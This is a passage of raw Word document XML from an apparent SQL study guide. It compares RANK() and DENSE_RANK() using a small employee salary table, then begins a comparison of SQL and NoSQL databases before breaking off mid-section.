      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="42E2BEB1" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38244EAB" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522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ployee</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63EAC698" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522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alary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40D19234" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522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Rank</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="3065640A" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FBA5210"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79EAE768"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1500</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43BC7871"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="71F77A55" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CBB9712"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Jane</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="039F534D"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1200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="124B6893"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="320EC77A" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E1D1227"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Jack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C4E44FF"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1200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61B9DAE1"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="64412595" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C074FB6"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F89E264"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1000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27BEF81D"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="324BB60C"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As you can see, since Jane and Jack have the same salary, they both get the rank 2, but the next rank given is 4, skipping 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D93B9F0" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522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2. DENSE_RANK()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4750DBEB"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The DENSE_RANK() function also assigns a rank to each distinct value in the ordered result set, but unlike RANK(), there are </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no gaps</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the ranking when there are ties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041194E6"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If two rows have the same value, they will have the same rank, and the next rank will be the immediate next number without any gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3189FCD2" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522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ample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B4BFC9"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Using the same data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522E3E09"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SELECT Employee, Salary, DENSE_RANK() OVER (ORDER BY Salary DESC) AS DenseRank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530ECC11"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FROM Employees;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B7781F"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Outp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8"/>
        <w:gridCol w:w="618"/>
        <w:gridCol w:w="1098"/>
      </w:tblGrid>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="6892D709" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E883633" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522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ployee</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A93FC99" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522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alary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A4E4AA8" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522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DenseRank</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="65CDEC15" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64506376"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B0494FC"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1500</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79D46FB2"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="07A2BBBB" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27E6DB8A"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Jane</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E8104EA"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1200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16A65F4D"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="45ECB156" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0908B59A"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Jack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E2B7F0E"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1200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55B61912"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="63E5478F" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="245C1C5E"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CB8F9BE"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1000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F51E5AF"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DF722BF"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In this case, since Jane and Jack have the same salary, they both get the rank 2, but the next rank is 3, without skipping any numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFCE582" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522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Key Differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFD8A43"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RANK()</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Can produce gaps in ranking when there are ties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AE049B"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DENSE_RANK()</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Does not produce gaps and assigns consecutive ranks even when there are ties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF38719" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522B"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C92AD49"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RANK()</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is useful when you want to maintain the ranking sequence, accounting for the skipped ranks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520EB63D" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522B" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DENSE_RANK()</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is useful when you want to have consecutive ranks even if there are ties in the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18757924" w14:textId="64CF9BEE"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0B4B5A30">
          <v:rect id="_x0000_i3045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="336BB3EF" w14:textId="3B3ABD97" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="0090522B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="746" w:name="_Toc196308226"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="0067691E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between SQL and NoSQL</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="746"/>
    </w:p>
    <w:p w14:paraId="4DF9FCDB" w14:textId="74F58175" w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w:rsidRDefault="002E5BA0" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The main difference between </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Structured Query Language) and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Not Only SQL) databases lies in their data models, scalability, consistency, and types of operations they support. Here’s a detailed comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6639F3"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1. Data Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC9D155"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QL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F706A3D"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Relational database management systems (RDBMS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A8A77C"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Data is structured in tables (rows and columns), and schema is defined ahead of time (schema-based).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2E2DAB"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Tables are related to each other via keys (primary key, foreign key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399AC8FF"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Examples: MySQL, PostgreSQL, Oracle, MS SQL Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021DAA3E"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NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4718CA90"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lastRenderedPageBreak/>
        <w:t>Non-relational databases with flexible schemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1FDF71"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Data can be stored in various forms: key-value pairs, documents, wide-column stores, or graphs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACBB675"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Schema is dynamic (schema-less) and can evolve without affecting the entire database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2423A07D"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Examples: MongoDB (Document Store), Cassandra (Wide-Column Store), Redis (Key-Value Store), Neo4j (Graph DB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D0AA2A"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2. Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311CBD10"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QL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368DE44E"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vertical Scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: SQL databases are typically scaled by increasing the power of a single server (adding CPU, RAM, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7C67D6"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Scaling is often more challenging and expensive because scaling a monolithic RDBMS requires significant resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA88556"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NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B10132E"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Horizontal Scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: NoSQL databases are designed to scale out by adding more servers or nodes to the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BC8481"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They are inherently better suited for distributing data across multiple servers, making them easier to scale and more cost-effective for large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25343CEE"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3. Transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601237CC"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QL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F375EF"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ACID (Atomicity, Consistency, Isolation, Durability)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> properties ensure reliable and consistent transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58003015"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Great for applications where data consistency and integrity are critical, such as financial systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4182CD"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NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E43BEE6"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 xml:space="preserve">Generally, NoSQL databases focus on </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eventual Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than strict consistency, prioritizing availability and partition tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FF61E2"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Some NoSQL databases (e.g., MongoDB, Couchbase) offer limited ACID support, but not all NoSQL databases guarantee full ACID compliance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5AFD42"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Examples of eventual consistency are observed in distributed systems like Cassandra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB2A4DD"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4. Query Language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6BB4F5"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QL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0A12D0"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 xml:space="preserve">Uses </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Structured Query Language (SQL)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for querying and managing data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C80A07C"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SQL provides a powerful, standardized syntax for querying and manipulating data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9996AD"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SQL queries are powerful for joining multiple tables, filtering, aggregating, and ensuring relational integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08365EB1"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NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
